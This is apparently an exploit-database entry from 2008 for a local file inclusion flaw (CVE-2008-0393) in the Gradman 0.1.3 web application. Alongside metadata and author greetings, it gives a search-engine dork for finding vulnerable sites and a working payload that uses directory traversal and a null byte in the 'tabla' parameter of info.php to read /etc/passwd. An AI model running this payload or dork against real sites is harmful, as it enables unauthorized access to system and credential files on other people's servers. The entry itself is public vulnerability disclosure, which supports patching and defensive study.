Gradman 0.1.3 - 'info.php' Local File Inclusion
Author: Syndr0me
type: webapps
platform: php
port:
date_added: 2008-01-17
date_updated: 2016-10-27
verified: 1
codes: OSVDB-40559;CVE-2008-0393
tags:
aliases:
screenshot_url:
application_url:
Software: Gradman <= 0.1.3
HomePage: http://gradman.xe1ido.com.mx/
Software: Gradman <= 0.1.3
Exploit: Local File Inclusion [High]
Dork: "powered by Gradman"
Bug Found By: Syndr0me! site: www.remoteexecution.es
Where: info.php?tabla=
Greetz: S4nt0!, Yubix, Xarnuz, Chame, Electr0cbax, komtec1, f34r
[+] Exploit:
info.php?tabla=../../../../../../../../../../../../../../../../etc/passwd%00
# milw0rm.com [2008-01-18]